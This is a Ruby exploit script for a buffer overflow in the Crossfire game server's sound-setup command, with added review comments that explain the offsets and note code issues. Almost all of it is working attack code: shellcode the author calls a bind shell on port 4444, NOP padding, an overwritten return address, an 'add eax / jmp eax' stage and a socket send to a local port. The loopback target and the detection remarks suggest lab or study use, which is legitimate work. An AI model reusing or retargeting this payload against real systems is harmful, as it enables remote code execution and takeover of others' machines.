#!/usr/bin/env ruby
=begin
This exploit takes advantage of a buffer overflow vulnerability during the
sound setup stage of the game Crossfire.
=end
require 'socket'
#total size = 4379
#offset = 4368
#bad chars = "\x00\x0a\x0d\x20"
#add eax, 12 = 83C00C
#jmp eax = FFE0
#create shellcode
#creates a bind shell on port 4444
# Stage-two payload bytes. Per the author's note above this is a bind shell on
# port 4444; the bytes are not decoded here, so treat that description as the
# author's claim. From a defender's view the observable effect would be a new
# listening socket appearing on the game host after the crash -- an unexpected
# listener on a server process is the detection angle for this class of bug.
# Seven lines of 15 bytes each, so the literal is 105 bytes long.
shellcode = "\xba\xe9\x41\x08\x31\xdb\xd3\xd9\x74\x24\xf4\x58\x29\xc9\xb1"+
"\x14\x31\x50\x14\x83\xc0\x04\x03\x50\x10\x0b\xb4\x39\xea\x3c"+
"\xd4\x69\x4f\x91\x71\x8c\xc6\xf4\x36\xf6\x15\x76\x6d\xa9\xf7"+
"\x1e\x90\x55\xe9\x82\xfe\x45\x58\x6a\x76\x84\x30\xec\xd0\x8a"+
"\x45\x79\xa1\x10\xf5\x7d\x92\x7f\x34\xfd\x91\xcf\xa0\x30\x95"+
"\xa3\x74\xa0\xa9\x9b\x4b\xb4\x9f\x62\xac\xdc\x30\xba\x3f\x74"+
"\x27\xeb\xdd\xed\xd9\x7a\xc2\xbd\x76\xf4\xe4\x8d\x72\xcb\x67"
#create buffer to cause the crash
# 0x90 filler. 4368 is the overwrite offset noted at the top of the file and
# 105 is the shellcode length, so shellcode + buffer together span exactly the
# 4368 bytes before the saved return address.
buffer = "\x90" * (4368 - 105)
#create eip value
# Four bytes written over the saved return address (offset 4368). Presumably a
# little-endian address (0x08134597) -- the file does not say what it points to.
eip = "\x97\x45\x13\x08"
#create stage one
# Matches the opcode notes at the top of the file: 83 C0 0C (add eax, 12)
# followed by FF E0 (jmp eax).
stage_one = "\x83\xC0\x0C\xFF\xE0"
#create padding
# 4379 is the total overflow size noted at the top; after the offset, the
# 4-byte eip and the 5-byte stage one, 2 bytes of 0x90 remain.
padding = "\x90" * (4379 - 4368 - 4 - 5)
#assemble payload
# "\x11(setup sound " is the protocol prefix; the 0x90/0x00/'#' trailer closes
# the message. `\#` is just a literal '#' -- it is escaped so Ruby does not
# treat a following '{' as interpolation. The multibyte escapes give the String
# an invalid UTF-8 encoding, but Socket#write sends the raw bytes unchanged.
payload = "\x11(setup sound " + shellcode + buffer + eip + stage_one + padding + "\x90\x00\#"
#send payload
puts "sending payload..."
# Target is hard-coded to the loopback interface on the server port 13327, i.e.
# this script is written to run against a local lab instance only.
socket = Socket.tcp("127.0.0.1", 13327)
socket.write(payload)
# NOTE(review): IO#gets returns nil when the peer closes the connection without
# sending a newline-terminated line (which is likely once the server process
# crashes), and `nil.chomp` raises NoMethodError. A `&.chomp` or a nil check
# would avoid the noisy traceback.
puts socket.gets.chomp
# NOTE(review): this close is skipped if write or gets raises. The block form
# `Socket.tcp(host, port) { |s| ... }` or an `ensure` would close it reliably.
socket.close
puts "payload sent... socket closed..."
# Redundant: the script would exit with status 0 here anyway.
exit(0)